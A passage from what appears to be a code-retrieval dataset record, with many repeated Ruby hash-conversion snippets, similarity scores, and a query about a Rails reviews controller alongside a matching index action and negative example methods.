"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def to_s\n to_hash.to_s\nend",
"def to_s\n to_hash.to_s\nend",
"def to_h(value)\n return value unless @to_h\n @to_h.call value\n end",
"def to_hash\n Hash[to_a]\n end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def to_s\n to_hash.to_s\n end",
"def to_s\n to_hash.to_s\n end",
"def read\n value = super\n value = value.to_hash if value.respond_to?(:to_hash)\n value\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end"
] |
[
"0.6718583",
"0.6718583",
"0.6669122",
"0.66569644",
"0.65872085",
"0.64544505",
"0.64143497",
"0.64143497",
"0.6380626",
"0.63490635",
"0.6302817",
"0.62250805",
"0.6151444",
"0.6102206",
"0.6081347",
"0.6081347",
"0.6073172",
"0.60373986",
"0.6020187",
"0.5937615",
"0.5901666",
"0.5901666",
"0.5901666",
"0.5901666",
"0.5901666",
"0.5888472",
"0.5888472",
"0.58825725",
"0.58825725",
"0.5864945",
"0.58564353",
"0.5833547",
"0.58219165",
"0.58219165",
"0.58219165",
"0.58219165",
"0.58219165",
"0.58219165",
"0.58219165",
"0.58219165",
"0.58219165",
"0.58219165",
"0.5805913",
"0.5805913",
"0.5797765",
"0.57809323",
"0.5774253",
"0.5774253",
"0.5774253",
"0.5774253",
"0.5774253",
"0.5774253",
"0.57714",
"0.57714",
"0.57679564",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725"
] |
0.0
|
-1
|
This is the controller method responsible for displaying all the reviews for a share
|
def index
@reviews = @share.reviews.order(priority: :asc)
@reviewToAlter = @share.reviews.new
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create\n\t\t@reviews = @share.reviews.order(priority: :asc)\n\t\t@reviewToAlter = @share.reviews.new(review_params)\n\t\t\n\t\tif @reviewToAlter.save\n\t\t\tredirect_to share_reviews_path(@share), notice: \"Review saved!\"\n\t\telse\n\t\t\tflash[:alert] = \"Error : #{@reviewToAlter.errors.full_messages.to_sentence}\"\n\t\t\trender :index\n\t\tend\n\tend",
"def index\n @reviews = Review.all\n \n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @item_reviews = ItemReview.all\n end",
"def index\n @item_reviews = ItemReview.all\n end",
"def index\n @reviews_and_ratings = ReviewsAndRating.all\n end",
"def index\n\t\t@reviews = @movie.reviews\n\tend",
"def index\n\t\t@store_reviews = @store.store_reviews;\t\t\n\tend",
"def index\n @reviews = current_user.reviews\n end",
"def index\n @reviews = @story.reviews\n end",
"def index\n @reviews = @post.reviews.all\n respond_with @post, @reviews\n end",
"def index\n @hm_reviews = HmReview.all\n end",
"def index\n @reviews = @publication.reviews.all\n end",
"def index\n\t\t\t\t# @reviews = Driver.find_by!(id: params[:driver_id]).driver_reviews#.order('created_at DESC').to_a\n\t\t\t\t@reviews = DriverReview.where(driver_id: params[:driver_id])\n\t\t\tend",
"def index\n @reviews = reviewable.reviews\n\n respond_to do |format|\n format.html\n format.json { render json: @reviews }\n end\n end",
"def index\n @shop_reviews = ShopReview.all\n end",
"def index\n @product_reviews = ProductReview.all\n end",
"def index\n @reviews = Review.all\n @review = Review.new(review: params[:review][:review], my_book_id: params[:my_book_id])\n end",
"def my_reviews\n @owner = current_user\n @reviews = Review.find(:all, :conditions => [\"user_id = ?\", @owner.id])\n render :action => \"index\"\n end",
"def reviews\n download_reviews\n @reviews.flatten!\n end",
"def index\n @first_reviews = FirstReview.all\n end",
"def show\n @reviews = Review.where(site_id: @site.id).order(\"created_at DESC\")\n end",
"def get_reviews\n @comment_reviews = CommentReview.where('comment_id = ?', params[:comment_id])\n end",
"def list\n @reviews = current_user.organization.reviews\n end",
"def index\n @visitor_reviews = VisitorReview.all\n end",
"def index\n @evenreviews = Evenreview.all\n end",
"def index\r\n if params[:review_id].nil?\r\n @comments = Comment.all\r\n else\r\n @review = Review.find(params[:review_id])\r\n @comments = @review.comments\r\n end\r\n\r\n respond_to do |format|\r\n format.html\r\n format.xml { render :xml => @comments }\r\n end\r\n end",
"def index\n\t\t@shop = Shop.find(params[:shop_id])\n\t\t@reviews = @shop.reviews\n\tend",
"def index\n @restaurant_reviews = RestaurantReview.all\n end",
"def show\n @review = find_review\n end",
"def index\n @admin_reviews = Review.all\n end",
"def index\n response.headers['X-Total-Count'] = @reviews.count.to_s\n @reviews = @reviews.page(params[:page]) if params[:page].present?\n @reviews = @reviews.per(params[:per]) if params[:per].present?\n\n _render collection: @reviews, flag: params[:flag].try(:to_sym)\n end",
"def index\n @reviews = Review.for_space params[:space_id]\n end",
"def show\n @item = Item.find(params[:id])\n @reviews = @item.reviews\n end",
"def view_reviews\n @submission = Submission.find(params[:id])\n @questions = @submission.assignment.questions.sort_by {|obj| obj.created_at }\n evaluation = @evaluations.where(:user_id => current_user.id)[0]\n @responses = @evaluations[0].responses.sort_by {|obj| obj.created_at }\n\n respond_to do |format|\n format.html { render view, :layout => 'no_sidebar' } # show.html.erb\n format.json { render json: @submission }\n end\n end",
"def index\n @pre_training_reviews = PreTrainingReview.all\n end",
"def index\n @critic_reviews = CriticReview.all\n end",
"def create\n @review = current_user.reviews.new #(params[:review])\n @review.creator_id = current_user.id\n @review.content = params[:review][:content]\n @review.reviewable_id = params[:review][:reviewable_id]\n @review.reviewable_type = params[:review][:reviewable_type]\n# @review.creator_id = params[:creator_id]\n# @review.place_id = params[:place_id] if params[:place_id]\n\n shared = false\n share = current_user.shares.find_by_provider(\"facebook\")\n if !share.nil?\n if share.share_review == true\n shared = true\n end\n end\n \n respond_to do |format|\n if @review.save\n if shared\n @content = @review.content\n @link = review_url(@review) #\"http://www.koedok.com\" #\n @name = \"www.koedok.com\"\n @user = current_user\n# graph.put_wall_post(content, {:name => name, :link => link})\n FbshareWorker.perform_async(@user.id, @content, @name, @link)\n# FbshareWorker.perform_async(token, content, name, link)\n# graph.put_wall_post(\"home\", {:name => \"place1\", :link => \"http://www.koedok.com\"})\n #graph.put_wall_post(\"home\", {:name => \"place1\", :link => review_path(@review)})\n end\n if false #disabled, not working with fb share\n @activity = Activity.create!(:user_id => @review.creator.id, :activity_type => Activity::CREATE_REVIEW, :target_type => @review.class.name, :target_id => @review.id)\n end\n# @activity = Activity.add(@review.creator, Activity::CREATE_REVIEW, @review, @review)\n# PrivatePub.publish_to(\"/reviews/new\", \"alert('#{@review.content}');\")\n #PrivatePub.publish_to(\"/reviews/new\", \"eval('#{@review.content}');\")\n format.html { redirect_to review_path(@review), :notice => t(:review_created) }\n format.json { render json: @review, status: :created, location: @review }\n format.js\n else\n format.html { render action: \"new\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def index\n @reviews = @place.reviews\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @reviews }\n end\n end",
"def index\n @review_counts = ReviewCount.all\n end",
"def index\n @review_projects = ReviewProject.all\n @type_reviews = TypeReview.all\n end",
"def index\n @tour_reviews = TourReview.all\n end",
"def index\n @company_reviews = CompanyReview.all\n end",
"def show\n @fullwidth = true\n if @user.is_artist\n @artist = @user\n if user_signed_in?\n @review = Review.find_by(receiving_user_id: @artist.id, leaving_user_id: current_user.id)\n @review.nil? ? @review = Review.new : @review\n end\n @reviews = @artist.received_reviews.page(params[:page]).order('updated_at DESC').per(25)\n @artist.view_count.present? ? @artist.view_count += 1 : @artist.view_count = 0\n @artist.save\n else\n @reviews = @user.left_reviews.page(params[:page]).order('updated_at DESC').per(25)\n end\n if params[:review].present?\n top_review = Review.find(params[:review])\n if params[:response_link].present?\n render 'show', locals: {top_review: top_review, response_link: true}\n else\n render 'show', locals: {top_review: top_review}\n end\n else\n respond_to do |format|\n format.html { render 'show' }\n format.js { render action: 'paginate_reviews' }\n end\n end\n end",
"def index\n @food_reviews = FoodReview.all\n end",
"def index\n @reviews = Review.where(shop_id: params[:shop_id])\n @shop = Shop.find(params[:shop_id])\n end",
"def index\n @reviews = Review.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @reviews }\n end\n end",
"def index\n @reviews = Review.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @reviews }\n end\n end",
"def show\n @reviews = Review.where(videogame_id: @videogame.id).order(\"created_at DESC\")\n \n if @reviews.blank?\n @avg_rating = 0\n else\n @avg_rating = @reviews.average(:rating).round(2)\n end\n end",
"def review\n @t = T\n @t = @t.paginate :page => params[:page], :per_page => params[:per_page]\n @data = @t.meanings\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @t }\n end\n end",
"def reviews\n @reviews\n end",
"def edit\n\t\t@reviews = @share.reviews.order(priority: :asc)\n\t\t@reviewToAlter = Review.find(params[:id])\n\tend",
"def expand_reviews\n @twitter_id = params[:twitter_id]\n @sentiment = params[:sentiment]\n @total_count = params[:count].to_i\n @page = (params[:page] || 1).to_i\n @limit = 25 # hard code for now\n @final_page = (@total_count - 1)/@limit + 1\n _build_pagination_array\n offset = (@page -1 ) * @limit\n @replies = Tweet.replies(@twitter_id, @sentiment, offset, @limit)\n end",
"def index\n @employee_reviews = EmployeeReview.all\n end",
"def update\n\t\t@reviews = @share.reviews.order(priority: :asc)\n\t\t@reviewToAlter = Review.find(params[:id])\n\t\t@review = Review.find(params[:id])\n\t\tif @review.update(review_params)\n\t\t\tredirect_to share_reviews_path(@share), notice: 'Review successfully updated!'\n\t\telse\n\t\t\tflash[:alert] = \"Error : #{@review.errors.full_messages.to_sentence}\"\n\t\t\trender :edit\n\t\tend\n\tend",
"def reviews( params={} )\n reviews = get_connections(\"reviews\", params)\n return map_connections reviews, :to => Facebook::Graph::Review\n end",
"def show\n @reviews = Review.select { |review| review.item_id == @item.id }\n @review = Review.new(item_id: @item.id)\n @ratingSum = 0.0\n @reviews.each do |review|\n @ratingSum = @ratingSum + review.rating\n end\n @avgRating = (@ratingSum/@reviews.count).round(1)\n if logged_in?\n @isPrevRented = Rental.find_by(user_id: current_user.id, history: true, item_id: params[:id])\n @isPrevReviewed = Review.find_by(user_id: current_user, item_id: params[:id])\n end\n @rentals = Rental.where(item_id: params[:id], history: true)\n end",
"def index\n @boo_k_reviews = BooKReview.all\n end",
"def reviews\n @items = ProductComment.includes(:account).where({product: @product}).all\n end",
"def show\n @reviews = Review.where(tutor_profile_id: @tutor_profile.id).order(\"created_at DESC\")\n if @reviews.blank?\n avg_rating = 0 \n else\n @avg_rating = @reviews.average(:rating).round(2) \n end\n end",
"def reviews(params = {})\n data = request(\"/review/list\", params.merge(v: \"2\"))\n reviews = data[\"reviews\"][\"review\"]\n if reviews.present?\n reviews.map { |review| Hashie::Mash.new(review) }\n else\n []\n end\n end",
"def show\n @review = Review.new\n\n if @listing.reviews.blank?\n @avg_rating = 0\n else\n @avg_rating = @listing.reviews.average(:rating).round(2)\n end\n\n end",
"def index\n @fourth_reviews = FourthReview.all\n end",
"def index\n @reviews = Review.find(:all, :limit => 10, :include => [:user, :package])\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @review }\n end\n end",
"def widget_reviews_list\n @snapshot = Snapshot.find(params[:snapshot_id])\n unless @snapshot && has_role?(:user, @snapshot)\n render :text => \"<b>Cannot access the reviews of this project</b>: access denied.\"\n return\n end\n\n @dashboard_configuration=Api::DashboardConfiguration.new(nil, :period_index => params[:period], :snapshot => @snapshot)\n render :partial => 'project/widgets/reviews/reviews_list'\n end",
"def show\n @reviews = Review.where(project_id: @project.id).order(\"created_at DESC\")\n end",
"def review\n\t\t@reviewer = Reviewer.find(params[:reviewer_id])\n\t\t@cardsort = Cardsort.find(params[:cardsort_id])\n\t\tcardsort_results = (@reviewer.cardsort_results & @cardsort.cardsort_results)\n\t\tif (!cardsort_results.empty?)\n\t\t\trender \"/cardsorts/404\" and return\n\t\tend\n\t\tbegin\n\t\t\t@cardsort.reviewers.find(@reviewer.id)\n\t\trescue\n\t\t\trender \"/cardosrt/506\" and return\n\t\tend\n\t\t@cards = @cardsort.cards\n\t\t@groups = @cardsort.groups\n\tend",
"def index\n @q = @ci_reviews.search params[:q]\n @ci_reviews = @q.result.page(params[:page])\n end",
"def index\n\t\t@book_reviews = BookReview.find_all_by_user_id(current_user.id)\n\n\t\trespond_to do |format|\n\t\t\tformat.html # index.html.erb\n\t\t\tformat.json { render :json => @book_reviews }\n\t\tend\n\tend",
"def index\n @user_reviews = UserReview.all.order(:rate_period).page(params[:page])\n end",
"def show\n\t@review = Review.joins(:site).includes(:site).find(params[:id])\n end",
"def index\n # this is our list page for our review\n # variable is @.\n # creating a filter variable for price\n @price = params[:price]\n #creating a filter variable for cuisine\n @cuisine = params[:cuisine]\n # adding location filter using geocoder\n @location = params[:location]\n\n #filtering properly by get all the reviews \"Review\" model from the database\n #creating new review variable as ruby list[]\n #@reviews = [\"The Smile\", \"Baby Bo's\", \"Chipotle\", \"nandos\"]\n @reviews = Review.all\n\n # filtering by price. this will toggle on/off depend when it has filter\n if @price.present?\n #take all of the review we have and replace the original review with filtered ones\n # find the value of the price in db that matches the param above\n @reviews = @reviews.where(price: @price)\n end\n\n #filter by cuisine\n if @cuisine.present?\n @reviews = @reviews.where(cuisine: @cuisine)\n end\n #search near the location\n if @location.present?\n # .near is what geo lcation given to us - see docs\n @reviews = @reviews.near(@location)\n end\n\n end",
"def index\n @review_templates = ReviewTemplate.all\n end",
"def show\n @review = @post.reviews.find(params[:id])\n respond_with @post, @review\n end",
"def show\n @user = current_user\n @review = Review.joins(:movie).includes(:movie)\n .find_by_id(params[:id])\n\n @comments = @review.review_comments.map do |comment|\n if @user != nil\n belongs_to_user = @user.id == comment.user_id\n else\n belongs_to_user = false\n end\n {\n id: comment.id,\n body: comment.body,\n author: comment.user.nickname,\n author_image: comment.user.image,\n belongs_to_user: belongs_to_user\n }\n end\n if @user != nil\n @review_likes = ReviewLike.where(\"user_id = ? AND review_id = ?\", @user.id, @review.id)\n if @review_likes.empty?\n review_like_id = 'null'\n review_liked = false\n else\n review_like_id = @review_likes[0].id\n review_liked = true\n end\n else\n review_like_id = 'null'\n review_liked = 'null'\n end\n\n review = {\n title: @review.title,\n id: @review.id,\n likes: @review.likes,\n body: @review.body,\n genre: @review.genre,\n movie: @review.movie,\n belongs_to_user: @review.user == @user,\n review_like_id: review_like_id,\n review_liked: review_liked\n }\n render json: {review: review, comments: @comments}\n end",
"def index\n if current_user.type == \"Student\"\n @reviews = Review.all.search(params[:search])\n \n else\n @reviews = current_user.reviews\n end\n @review = Review.new\n end",
"def index\n @reviews = Review.order(:place_id)\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @reviews }\n end\n end",
"def review\n end",
"def show\n review_score = {usefulness: 0,friendliness: 0,}\n @review_count = 0\n conversations = Conversation.where(stylist_id: @professional_profile.user)\n conversations.each do |conversation|\n reviews = Review.where(conversation_id: conversation)\n if reviews.present?\n reviews.each do |review|\n @review_count += 1\n review_score[:usefulness] += review.usefulness\n review_score[:friendliness] += review.friendliness\n end\n @reviews_present = true\n else\n\n end\n end\n #What should no reviews be\n @userfulness_score = review_score[:usefulness].to_f / @review_count if review_score[:usefulness] != 0\n @friendliness = review_score[:friendliness].to_f / @review_count if review_score[:friendliness] != 0\n end",
"def index\n author = Author.find(params[:author_id])\n @reviews = author.reviews\n render json: @reviews\n end",
"def show\n @reviews = @movie.reviews.page params[:page]\n @reported_reviews = current_user.reported_reviews.where(movie: @movie).pluck(:review_id)\n end",
"def index\n @event_reviews = EventReview.all\n redirect_to \"/events\"\n end",
"def show\n @review = Review.find(params[:id])\n\n end",
"def index\n @add_image_to_reviews = AddImageToReview.all\n end",
